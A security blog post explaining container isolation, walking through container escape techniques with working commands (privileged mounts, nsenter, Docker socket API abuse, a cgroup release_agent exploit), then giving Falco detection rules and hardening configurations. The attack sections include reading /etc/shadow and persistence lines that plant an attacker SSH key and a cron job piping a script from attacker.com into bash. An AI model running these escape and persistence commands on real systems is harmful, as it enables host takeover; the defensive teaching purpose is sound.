Containers are not virtual machines, and treating them as if they were is one of the most consequential misunderstandings in modern infrastructure security. Where a virtual machine has a hypervisor isolation layer separating guest and host kernels, a container shares the host kernel directly. The isolation that makes containers lightweight (Linux namespaces and cgroups) is also what makes them escapable when misconfigured or when vulnerabilities are present.
This post examines how container isolation works at the kernel level, walks through the primary escape vectors with working demonstrations, covers real CVEs that enabled escapes, and provides a concrete detection and hardening framework.
How Container Isolation Works
A container is, at its core, a process (or group of processes) on the host with a restricted view of the system. That restriction is implemented through three kernel mechanisms:
Linux Namespaces
Namespaces partition global system resources so that each container sees its own isolated instance:
| Namespace | Isolates |
|---|---|
| pid | Process IDs; container processes cannot see host processes |
| net | Network interfaces, routing tables, iptables rules |
| mnt | Filesystem mount points |
| uts | Hostname and domain name |
| ipc | System V IPC, POSIX message queues |
| user | User and group IDs (remapped) |
| cgroup | Cgroup root directory (added in kernel 4.6) |
A container escape fundamentally involves gaining access to the host’s root namespace — the namespace context shared by all host processes.
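One way to see this boundary from userspace is to compare namespace identifiers. The sketch below is a minimal illustration, assuming a Linux system where /proc/<pid>/ns/ is readable; the helper names (parse_ns_link, read_namespaces, shared_namespaces) and the inode numbers in the example are invented for this post. Two processes are in the same namespace when the corresponding links carry the same inode number.

```python
from __future__ import annotations

import os
import re

# Targets of /proc/<pid>/ns/* symlinks look like "pid:[4026531836]".
NS_LINK = re.compile(r"^(\w+):\[(\d+)\]$")


def parse_ns_link(link: str) -> tuple[str, int]:
    """Split a namespace symlink target into (type, inode)."""
    match = NS_LINK.match(link)
    if match is None:
        raise ValueError(f"not a namespace link: {link!r}")
    return match.group(1), int(match.group(2))


def read_namespaces(pid: int | str = "self") -> dict[str, int]:
    """Return {entry name: inode} for one process (Linux only)."""
    ns_dir = f"/proc/{pid}/ns"
    result = {}
    for entry in os.listdir(ns_dir):
        _, inode = parse_ns_link(os.readlink(os.path.join(ns_dir, entry)))
        result[entry] = inode
    return result


def shared_namespaces(a: dict[str, int], b: dict[str, int]) -> list[str]:
    """Namespace types in which both processes see the same instance."""
    return sorted(ns for ns in a.keys() & b.keys() if a[ns] == b[ns])


# Illustrative values only: a container started with host networking.
host = {"pid": 4026531836, "net": 4026531840, "mnt": 4026531841}
container = {"pid": 4026532201, "net": 4026531840, "mnt": 4026532199}
print(shared_namespaces(host, container))  # ['net']
```

On a real system, comparing read_namespaces("self") from inside a container with the values seen for a host process shows which namespaces the container has actually been given. Every shared entry is a place where the container sees the host's instance of that resource.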
Control Groups (cgroups)
Cgroups limit resource consumption (CPU, memory, disk I/O, network) for process groups. They do not provide security isolation but they are critical for container functionality.
Linux Capabilities
Root on Linux is not monolithic. The kernel divides root’s traditional privileges into discrete capabilities: CAP_NET_BIND_SERVICE, CAP_SYS_ADMIN, CAP_CHOWN, etc. Docker drops many capabilities by default but retains a set sufficient for typical application use. The key attack surface: any capability that enables interaction with the host kernel in dangerous ways.
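Capability sets show up in /proc/<pid>/status as hexadecimal bitmasks (CapEff, CapPrm, and so on), which are hard to read at a glance. The following sketch decodes such a mask into names. The bit positions follow the kernel's linux/capability.h; the function name decode_caps is hypothetical, and bits beyond the table are reported generically rather than guessed.

```python
from __future__ import annotations

# Capability names indexed by bit position (linux/capability.h).
CAP_NAMES = [
    "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_DAC_READ_SEARCH", "CAP_FOWNER",
    "CAP_FSETID", "CAP_KILL", "CAP_SETGID", "CAP_SETUID", "CAP_SETPCAP",
    "CAP_LINUX_IMMUTABLE", "CAP_NET_BIND_SERVICE", "CAP_NET_BROADCAST",
    "CAP_NET_ADMIN", "CAP_NET_RAW", "CAP_IPC_LOCK", "CAP_IPC_OWNER",
    "CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_CHROOT", "CAP_SYS_PTRACE",
    "CAP_SYS_PACCT", "CAP_SYS_ADMIN", "CAP_SYS_BOOT", "CAP_SYS_NICE",
    "CAP_SYS_RESOURCE", "CAP_SYS_TIME", "CAP_SYS_TTY_CONFIG", "CAP_MKNOD",
    "CAP_LEASE", "CAP_AUDIT_WRITE", "CAP_AUDIT_CONTROL", "CAP_SETFCAP",
    "CAP_MAC_OVERRIDE", "CAP_MAC_ADMIN", "CAP_SYSLOG", "CAP_WAKE_ALARM",
    "CAP_BLOCK_SUSPEND", "CAP_AUDIT_READ", "CAP_PERFMON", "CAP_BPF",
    "CAP_CHECKPOINT_RESTORE",
]


def decode_caps(hex_mask: str) -> list[str]:
    """Translate a CapEff-style hex string into capability names."""
    mask = int(hex_mask, 16)
    names = []
    for bit in range(mask.bit_length()):
        if mask & (1 << bit):
            # Unknown high bits are labelled by number, not invented.
            names.append(CAP_NAMES[bit] if bit < len(CAP_NAMES) else f"CAP_{bit}")
    return names


# A mask commonly seen for a container running with Docker's defaults.
default_caps = decode_caps("00000000a80425fb")
print(len(default_caps), "CAP_SYS_ADMIN" in default_caps)  # 14 False
```

A mask with every defined bit set, such as 0000003fffffffff on older kernels, decodes to a list that includes CAP_SYS_ADMIN, which is the signal to look for when auditing a running container.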
Escape Vector 1: Privileged Container
The most common and straightforward escape path is a container run with --privileged or with privileged: true in its Kubernetes pod spec.
Attack Flow
- Attacker gains code execution inside a privileged container (RCE via web app vulnerability, supply chain attack on container image, etc.)
- Container process can access all host devices via /dev
- Attacker mounts the host filesystem by identifying and mounting the host’s root disk
# Step 1: Confirm we're in a privileged container
grep CapEff /proc/1/status
# CapEff: 0000003fffffffff (every capability bit set = privileged;
# newer kernels define more capabilities, so the mask may be wider, e.g. 000001ffffffffff)

# Step 2: Identify the host disk device
fdisk -l 2>/dev/null | grep "^Disk /dev/sd"
# or: lsblk

# Step 3: Mount host root filesystem
mkdir /tmp/hostfs
mount /dev/sda1 /tmp/hostfs

# Step 4: Chroot into host filesystem for full interactive access
chroot /tmp/hostfs /bin/bash

# Now we have a root shell on the host filesystem
cat /etc/shadow
ls /root/
crontab -l # read host cron jobs
exit # leave the chroot; the /tmp/hostfs paths below are relative to the container

# Step 5: Persistence: add SSH key to host root
mkdir -p /tmp/hostfs/root/.ssh
echo "ssh-rsa AAAA...attacker_key..." >> /tmp/hostfs/root/.ssh/authorized_keys

# Or write a host-level cron job
echo "* * * * * root curl http://attacker.com/shell | bash" >> /tmp/hostfs/etc/crontab
Alternative: Privileged + nsenter
# Use nsenter to enter host namespaces directly
# This requires the container to share the host PID namespace (--pid=host or hostPID: true);
# otherwise PID 1 is the container's own init process, not the host's
nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash

# This drops you into a bash shell in the host's mount, UTS, IPC, network, and PID namespaces
# Effectively equivalent to running bash directly on the host
hostname # shows host hostname, not container hostname
ps aux # shows all host processes
Escape Vector 2: Docker Socket Mount
When /var/run/docker.sock is mounted inside a container, any process in that container can talk to the Docker daemon — which runs as root on the host with full container management authority.
This is extremely common in CI/CD pipelines (Jenkins, GitLab Runner, Drone) that mount the Docker socket to enable “Docker-in-Docker” builds.
Attack Flow
- Attacker gains code execution inside a container with /var/run/docker.sock mounted
- Docker CLI (or HTTP API via curl/python) is used to create a new container
- The new container is started with privileged mode and the host filesystem mounted
- Attacker executes commands in the new container to interact with the host
# Step 1: Verify Docker socket is available
ls -la /var/run/docker.sock
# srw-rw---- 1 root docker /var/run/docker.sock

# Step 2: If Docker CLI is not available, use curl with Unix socket
curl --unix-socket /var/run/docker.sock http://localhost/version

# Step 3a: Docker CLI approach: spawn privileged container with host fs
docker run -v /:/hostfs -it --privileged alpine chroot /hostfs /bin/bash

# Step 3b: API approach using curl (no docker CLI required)
# Create container (the URL is quoted so the shell does not treat "?" as a glob)
curl --unix-socket /var/run/docker.sock \
  -H "Content-Type: application/json" \
  -d '{
    "Image": "alpine",
    "Cmd": ["/bin/sh", "-c", "chroot /hostfs cat /etc/shadow"],
    "HostConfig": {
      "Binds": ["/:/hostfs:rw"],
      "Privileged": true
    }
  }' \
  -X POST "http://localhost/containers/create?name=escape"

# Start the container (its output is then available from the container's logs)
curl --unix-socket /var/run/docker.sock \
  -X POST http://localhost/containers/escape/start
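From the defender's side, the conditions that make this vector possible are visible in the output of docker inspect. The sketch below flags them for a single inspect entry. The keys it reads (HostConfig.Privileged, HostConfig.PidMode, HostConfig.Binds, HostConfig.CapAdd) are fields of the Docker Engine API's inspect response; the function name risky_settings and the choice of what counts as risky are assumptions made for illustration.

```python
from __future__ import annotations


def risky_settings(inspect_entry: dict) -> list[str]:
    """Return human-readable findings for one `docker inspect` entry."""
    host_config = inspect_entry.get("HostConfig") or {}
    findings = []
    if host_config.get("Privileged"):
        findings.append("privileged mode")
    if host_config.get("PidMode") == "host":
        findings.append("host PID namespace")
    # Binds are strings of the form "source:destination[:options]".
    for bind in host_config.get("Binds") or []:
        source = bind.split(":", 1)[0]
        if source.endswith("docker.sock"):
            findings.append(f"Docker socket bind: {bind}")
        elif source == "/":
            findings.append(f"host root bind: {bind}")
    for cap in host_config.get("CapAdd") or []:
        if cap.upper() in ("SYS_ADMIN", "CAP_SYS_ADMIN", "ALL"):
            findings.append(f"added capability: {cap}")
    return findings


# Hypothetical CI runner that mounts the Docker socket.
ci_runner = {
    "HostConfig": {
        "Privileged": False,
        "Binds": ["/var/run/docker.sock:/var/run/docker.sock"],
    }
}
for finding in risky_settings(ci_runner):
    print(finding)
```

In practice the input would come from parsing the JSON array that docker inspect prints for the running containers and calling the function on each element.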
Escape Vector 3: CVE-2019-5736 (runc Binary Overwrite)
CVE-2019-5736, discovered by Adam Iwaniuk and Borys Popławski, allowed a malicious container to overwrite the host runc binary and achieve code execution as root on the host.
Affected versions: runc through 1.0-rc6 (fixed in 1.0-rc7), Docker < 18.09.2, containerd < 1.0.3
Vulnerability mechanism: During docker exec, runc opens /proc/self/exe (which points to the runc binary on the host) via a symlink in the container filesystem. By controlling when and how this symlink resolves, the container can write to the host runc binary while it is being executed.
Conceptual Attack Flow
- Attacker creates a malicious container image with a custom init binary that replaces itself with a symlink to /proc/self/exe at the right moment
- When docker exec is invoked on the container, runc opens the symlink
- The container replaces the symlink target with a write-open to /proc/self/exe
- The container writes a malicious payload over the runc binary on the host
- On the next container exec, the malicious binary runs as root on the host
# Detection: check runc version
runc --version
# Patched builds report 1.0-rc7 or later (1.0-rc6 and earlier are vulnerable
# unless the distribution backported the fix)

# Check Docker version (includes runc version)
docker version | grep -A5 "Server:"

# Verify runc binary integrity
sha256sum "$(which runc)"
# Compare against known-good hash from distribution vendor
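The version check can be automated across a fleet. The sketch below parses the first version string in the output of runc --version and reports whether it falls in the affected range (anything up to and including 1.0.0-rc6). The function name is hypothetical, and the result is only a first-pass signal: distributions that backported the fix keep an old version string, so a True result should be confirmed against the vendor's advisory.

```python
from __future__ import annotations

import re

# Matches "1.0.0-rc6", "1.0-rc6", "1.1.12", and similar.
VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-rc\.?(\d+))?")


def runc_in_affected_range(version_output: str) -> bool | None:
    """True if the version is <= 1.0.0-rc6, None if no version is found."""
    match = VERSION_RE.search(version_output)
    if match is None:
        return None
    release = (int(match.group(1)), int(match.group(2)), int(match.group(3) or 0))
    rc = int(match.group(4)) if match.group(4) else None
    if release < (1, 0, 0):
        return True
    if release == (1, 0, 0) and rc is not None:
        # Release candidates up to rc6 predate the fix.
        return rc <= 6
    return False


for sample in ("runc version 1.0.0-rc6", "runc version 1.0.0-rc7", "runc version 1.1.12"):
    print(sample, "->", runc_in_affected_range(sample))
```

Returning None for unparseable output is a deliberate choice, so that an unexpected format is treated as "unknown" rather than silently as "safe".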
Patch released: February 11, 2019. CVSS: 8.6.
Escape Vector 4: CVE-2022-0492 (cgroup v1 release_agent)
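This vulnerability abused the release_agent feature in cgroup v1. When a cgroup with notify_on_release enabled becomes empty (all processes exit), the kernel executes the program named in the hierarchy's release_agent file as root in the host namespace. The bug was that the kernel did not verify that the process writing release_agent held CAP_SYS_ADMIN in the initial user namespace.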
Conditions required for exploitation:
- Container must have the CAP_SYS_ADMIN capability, or be able to obtain it inside a new user namespace, so that it can mount cgroup filesystems
- cgroup v1 must be in use (not cgroup v2)
- User namespaces must be available
# Step 1: Check if cgroup v1 is in use
head -5 /proc/1/cgroup
# Lines such as "12:memory:/docker/<id>" indicate cgroup v1; a single "0::/..." line indicates cgroup v2

# Step 2: Create a new cgroup hierarchy with a release_agent
mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp
mkdir /tmp/cgrp/x

# Step 3: Enable release notification and point release_agent at the payload's host-side path
echo 1 > /tmp/cgrp/x/notify_on_release
# host_path is the container's overlayfs upperdir as seen from the host
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path/exploit" > /tmp/cgrp/release_agent

# Step 4: Write the payload that runs on the host
# The heredoc is unquoted so $host_path expands now; the payload must write
# under $host_path for the result to appear inside the container as /output
cat > /exploit << EOF
#!/bin/sh
ps aux > $host_path/output
chmod 777 $host_path/output
EOF
chmod a+x /exploit

# Step 5: Trigger cgroup empty notification by starting and killing a process
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs && exit"

# Step 6: Read the output file that was written by the host-level release_agent
cat /output # Contains host process listing
Patch released: February 2022, kernel 5.17-rc3. CVSS: 7.8.
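Because the release_agent mechanism exists only in cgroup v1, knowing which cgroup version a workload runs under is a useful first triage step. The sketch below classifies the contents of a /proc/<pid>/cgroup file. It assumes the documented line format (hierarchy-ID:controller-list:path, where cgroup v2 uses hierarchy ID 0 and an empty controller list); the function name cgroup_mode is made up for this example.

```python
def cgroup_mode(proc_cgroup_text: str) -> str:
    """Classify /proc/<pid>/cgroup content as 'v1', 'v2', 'hybrid' or 'unknown'."""
    saw_v1 = saw_v2 = False
    for line in proc_cgroup_text.splitlines():
        parts = line.split(":", 2)
        if len(parts) != 3:
            continue  # not a cgroup membership line
        hierarchy_id, controllers, _path = parts
        if hierarchy_id == "0" and controllers == "":
            saw_v2 = True  # unified hierarchy entry, e.g. "0::/system.slice/x"
        else:
            saw_v1 = True  # legacy entry, e.g. "12:memory:/docker/<id>"
    if saw_v1 and saw_v2:
        return "hybrid"
    if saw_v1:
        return "v1"
    if saw_v2:
        return "v2"
    return "unknown"


legacy = "12:memory:/docker/abc\n11:cpu,cpuacct:/docker/abc\n"
unified = "0::/system.slice/docker-abc.scope\n"
print(cgroup_mode(legacy), cgroup_mode(unified))  # v1 v2
```

A result of v1 or hybrid means the release_agent interface exists on that host, so kernel patch level and the seccomp/AppArmor/SELinux configuration deserve a closer look.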
Real Incident: Docker Daemon Exposed Over TCP
In 2019, multiple cryptocurrency mining campaigns (tracked by Palo Alto Unit 42 and Aqua Security) exploited Docker daemons that had been configured to listen on TCP port 2375 without TLS authentication — a configuration explicitly warned against in Docker documentation but commonly found in development environments.
Attack pattern:
- Masscan/Shodan enumeration for port 2375 open on the internet
- Connection to unauthenticated Docker API: curl http://target:2375/containers/json
- Deploy a new container with host / mounted
- Install cryptocurrency miner (XMRig) as a persistent host process via cron or systemd
Aqua Security estimated over 400 honeypot hits per day at the peak of these campaigns in 2019. Similar attacks targeting exposed Kubernetes API servers ran in parallel.
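The misconfiguration behind these incidents can often be caught by inspecting the daemon configuration before it ever reaches production. The sketch below looks at a parsed /etc/docker/daemon.json and returns any TCP listeners that are not protected by client certificate verification. The hosts and tlsverify keys are real daemon.json options; the function name is hypothetical, and the check does not cover listeners added with -H on the dockerd command line.

```python
from __future__ import annotations

import json


def unauthenticated_tcp_hosts(daemon_config: dict) -> list[str]:
    """Return tcp:// listeners that accept clients without TLS verification."""
    if daemon_config.get("tlsverify"):
        return []  # clients must present a certificate signed by the trusted CA
    return [
        host
        for host in daemon_config.get("hosts") or []
        if host.startswith("tcp://")
    ]


# Example configuration of the kind found in development environments.
config_text = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'
print(unauthenticated_tcp_hosts(json.loads(config_text)))  # ['tcp://0.0.0.0:2375']
```

The check flags loopback-only TCP listeners as well, on the assumption that any unauthenticated TCP endpoint is one firewall change away from being exposed.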
Detection with Falco
Falco is the de facto standard for runtime security monitoring of containers. It uses eBPF or kernel module probes to detect syscall-level anomalies.
# /etc/falco/rules.d/container-escape.yaml

# Detect privileged container creation
- rule: Create Privileged Container
  desc: Detect creation of a privileged container
  condition: >
    container.id != host
    and evt.type = container
    and container.privileged = true
  output: >
    Privileged container started (user=%user.name command=%proc.cmdline
    container_id=%container.id image=%container.image.repository)
  priority: WARNING
  tags: [container, privilege-escalation, T1611]

# Detect Docker socket access from within a container
- rule: Docker Socket Accessed from Container
  desc: Detect access to Docker socket from inside a container
  condition: >
    open_write
    and container
    and fd.name = /var/run/docker.sock
  output: >
    Docker socket accessed inside container (user=%user.name
    command=%proc.cmdline container=%container.name)
  priority: CRITICAL
  tags: [container, escape, T1611]

# Detect nsenter execution (namespace escape tool)
- rule: nsenter Executed in Container
  desc: Detect nsenter used to enter host namespaces
  condition: >
    spawned_process
    and container
    and proc.name = nsenter
  output: >
    nsenter executed in container (user=%user.name args=%proc.args
    container=%container.name pid=%proc.pid)
  priority: CRITICAL

# Detect mount of host /proc or /dev
- rule: Sensitive Host Filesystem Mounted
  desc: Detect mounting of sensitive host paths
  condition: >
    spawned_process
    and container
    and proc.name = mount
    and (proc.args contains "/proc" or proc.args contains "/dev" or proc.args contains "/sys")
  output: >
    Sensitive host filesystem mounted in container
    (command=%proc.cmdline container=%container.name)
  priority: CRITICAL
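Rules only help if someone acts on the alerts. When Falco is configured with JSON output, each alert is a single JSON object per line with fields such as rule, priority, and output, which makes it straightforward to route the most severe events. The sketch below filters a stream of such lines by minimum priority; the function name and the example events are invented, and the priority ordering follows Falco's documented levels from debug up to emergency.

```python
import json

# Falco priority levels, lowest to highest.
SEVERITY_ORDER = [
    "debug", "informational", "notice", "warning",
    "error", "critical", "alert", "emergency",
]


def alerts_at_or_above(lines, minimum="critical"):
    """Yield parsed Falco JSON events whose priority is >= minimum."""
    threshold = SEVERITY_ORDER.index(minimum.lower())
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip non-JSON log lines
        if not isinstance(event, dict):
            continue
        priority = str(event.get("priority", "")).lower()
        if priority in SEVERITY_ORDER and SEVERITY_ORDER.index(priority) >= threshold:
            yield event


sample = [
    '{"rule": "nsenter Executed in Container", "priority": "Critical", "output": "..."}',
    '{"rule": "Create Privileged Container", "priority": "Warning", "output": "..."}',
]
for event in alerts_at_or_above(sample):
    print(event["rule"])  # nsenter Executed in Container
```

The same generator works on any iterable of lines, so it can be pointed at an open log file or at standard input without changes.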
Audit Log Monitoring
# Kubernetes audit log: detect privileged pod creation
# Query audit logs for pods with privileged security context
# (requestObject is only recorded when the audit policy level is Request or RequestResponse)
cat /var/log/kubernetes/audit.log | \
  python3 -c "
import sys, json
for line in sys.stdin:
    try:
        event = json.loads(line)
    except json.JSONDecodeError:
        continue  # skip truncated or non-JSON lines
    ref = event.get('objectRef') or {}
    if event.get('verb') in ('create', 'update') and ref.get('resource') == 'pods':
        spec = (event.get('requestObject') or {}).get('spec') or {}
        for container in spec.get('containers', []):
            sc = container.get('securityContext') or {}
            if sc.get('privileged'):
                print(f\"ALERT: Privileged pod: {ref.get('name')} by {(event.get('user') or {}).get('username')}\")
"

# Check Docker daemon audit logs (if auditd is configured)
ausearch -k docker --interpret | grep -E "privileged|/var/run/docker.sock"
Defense and Hardening
Control 1: Rootless Docker
# Install rootless Docker (requires uidmap package)
dockerd-rootless-setuptool.sh install

# Point the client at the rootless daemon's socket
export DOCKER_HOST=unix:///run/user/$(id -u)/docker.sock

# Verify rootless operation
docker info | grep -i rootless
# Should list "rootless" under Security Options
Control 2: Seccomp Profiles
Seccomp (Secure Computing Mode) restricts which syscalls a container process can make. The default Docker seccomp profile blocks ~44 syscalls. Apply stricter profiles:
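# Apply the default seccomp profile explicitly
docker run --security-opt seccomp=/etc/docker/seccomp-default.json myapp

# Use a custom profile that blocks mount-related syscalls.
# defaultAction must be SCMP_ACT_ALLOW for a denylist: with SCMP_ACT_ERRNO as the
# default, every syscall fails and the container cannot start.
# clone is left out because denying it outright prevents fork and thread creation.
# A custom profile replaces Docker's default rather than extending it, so in
# practice start from a copy of the default profile and tighten that.
cat > /etc/docker/seccomp-restricted.json << 'EOF'
{
  "defaultAction": "SCMP_ACT_ALLOW",
  "syscalls": [
    {
      "names": ["mount", "umount2", "pivot_root"],
      "action": "SCMP_ACT_ERRNO"
    }
  ]
}
EOF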
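It is easy to get the interaction between defaultAction and per-syscall rules wrong, so it helps to test a profile before deploying it. The sketch below answers "what happens to syscall X under this profile?" for the simple case of name-based rules. It is a simplification under stated assumptions: it ignores argument filters and architecture or capability conditions that real Docker profiles may contain, and the function name action_for is hypothetical.

```python
def action_for(profile: dict, syscall: str) -> str:
    """Return the seccomp action a profile applies to a syscall name."""
    for rule in profile.get("syscalls", []):
        if syscall in rule.get("names", []):
            return rule["action"]
    # No rule names this syscall, so the default applies.
    return profile["defaultAction"]


denylist = {
    "defaultAction": "SCMP_ACT_ALLOW",
    "syscalls": [{"names": ["mount", "umount2"], "action": "SCMP_ACT_ERRNO"}],
}
everything_denied = {
    "defaultAction": "SCMP_ACT_ERRNO",
    "syscalls": [{"names": ["mount"], "action": "SCMP_ACT_ERRNO"}],
}

print(action_for(denylist, "mount"))          # SCMP_ACT_ERRNO
print(action_for(denylist, "read"))           # SCMP_ACT_ALLOW
print(action_for(everything_denied, "read"))  # SCMP_ACT_ERRNO
```

The last case shows the failure mode to watch for: a profile whose default and rules both deny leaves no syscall permitted, including the ones needed to start the process.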
Control 3: AppArmor / SELinux
# Verify AppArmor is active for Docker
docker info | grep -i apparmor
# Should show: Security Options: apparmor

# Apply a custom AppArmor profile
cat > /etc/apparmor.d/docker-no-escape << 'EOF'
#include <tunables/global>
profile docker-no-escape flags=(attach_disconnected,mediate_deleted) {
  #include <abstractions/base>
  # AppArmor denies anything not explicitly allowed, so grant normal
  # file, network, and capability use before adding the deny rules
  file,
  network,
  capability,
  deny mount,
  deny /proc/sysrq-trigger rwklx,
  deny /proc/mem rwklx,
  deny /proc/kcore rwklx,
  deny /sys/** wklx,
}
EOF
apparmor_parser -r /etc/apparmor.d/docker-no-escape
docker run --security-opt apparmor=docker-no-escape myapp
Control 4: Drop Capabilities and Read-Only Root Filesystem
# Run with minimal capabilities and read-only filesystem
docker run \
  --cap-drop ALL \
  --cap-add NET_BIND_SERVICE \
  --read-only \
  --tmpfs /tmp \
  --security-opt no-new-privileges \
  myapp

# Equivalent Kubernetes pod spec
cat << 'EOF'
securityContext:
  runAsNonRoot: true
  runAsUser: 1000
  allowPrivilegeEscalation: false
  readOnlyRootFilesystem: true
  capabilities:
    drop:
      - ALL
    add:
      - NET_BIND_SERVICE
EOF
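These settings are simple enough to lint in CI before a manifest is applied. The sketch below checks one container-level securityContext, already parsed into a dictionary, against the controls in this section. The field names are the standard Kubernetes ones; the function name hardening_gaps and the exact list of checks are assumptions chosen to mirror the example above.

```python
from __future__ import annotations


def hardening_gaps(security_context: dict) -> list[str]:
    """List the hardening controls a container securityContext is missing."""
    gaps = []
    if security_context.get("privileged"):
        gaps.append("privileged is true")
    # Kubernetes allows escalation unless this is explicitly false.
    if security_context.get("allowPrivilegeEscalation") is not False:
        gaps.append("allowPrivilegeEscalation is not false")
    if not security_context.get("readOnlyRootFilesystem"):
        gaps.append("root filesystem is writable")
    if not security_context.get("runAsNonRoot"):
        gaps.append("runAsNonRoot is not set")
    dropped = (security_context.get("capabilities") or {}).get("drop") or []
    if "ALL" not in [cap.upper() for cap in dropped]:
        gaps.append("capabilities are not dropped with ALL")
    return gaps


hardened = {
    "runAsNonRoot": True,
    "runAsUser": 1000,
    "allowPrivilegeEscalation": False,
    "readOnlyRootFilesystem": True,
    "capabilities": {"drop": ["ALL"], "add": ["NET_BIND_SERVICE"]},
}
print(hardening_gaps(hardened))  # []
print(len(hardening_gaps({})))   # 4
```

An empty securityContext fails four of the five checks, which is a reminder that the Kubernetes defaults are permissive and each control has to be opted into.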
Control 5: OPA Gatekeeper Policy
# Gatekeeper ConstraintTemplate to block privileged containers
apiVersion: templates.gatekeeper.sh/v1beta1
kind: ConstraintTemplate
metadata:
  name: k8spspprivilegedcontainer
spec:
  crd:
    spec:
      names:
        kind: K8sPSPPrivilegedContainer
  targets:
    - target: admission.k8s.gatekeeper.sh
      rego: |
        package k8spspprivilegedcontainer
        violation[{"msg": msg}] {
          container := input.review.object.spec.containers[_]
          container.securityContext.privileged == true
          msg := sprintf("Container %v must not run as privileged", [container.name])
        }
---
apiVersion: constraints.gatekeeper.sh/v1beta1
kind: K8sPSPPrivilegedContainer
metadata:
  name: psp-privileged-container
spec:
  match:
    kinds:
      - apiGroups: [""]
        kinds: ["Pod"]
MITRE ATT&CK Mapping
- T1611 — Escape to Host: Adversaries may break out of a container to gain access to the host operating system.
- T1610 — Deploy Container: Deploy a malicious container into a compromised environment to facilitate escape.
- T1552.007 — Container API: Access container runtime APIs to gather credentials or escalate privileges.
References
- CVE-2019-5736 — runc Container Escape
- CVE-2022-0492 — Linux Kernel cgroup v1 Escape
- MITRE ATT&CK T1611 — Escape to Host
- Falco — Container Runtime Security
- Docker Security Documentation — Seccomp
- Aqua Security — Docker TCP Exposure Research
- Palo Alto Unit 42 — Exposed Docker Daemons
- NSA/CISA Kubernetes Hardening Guide





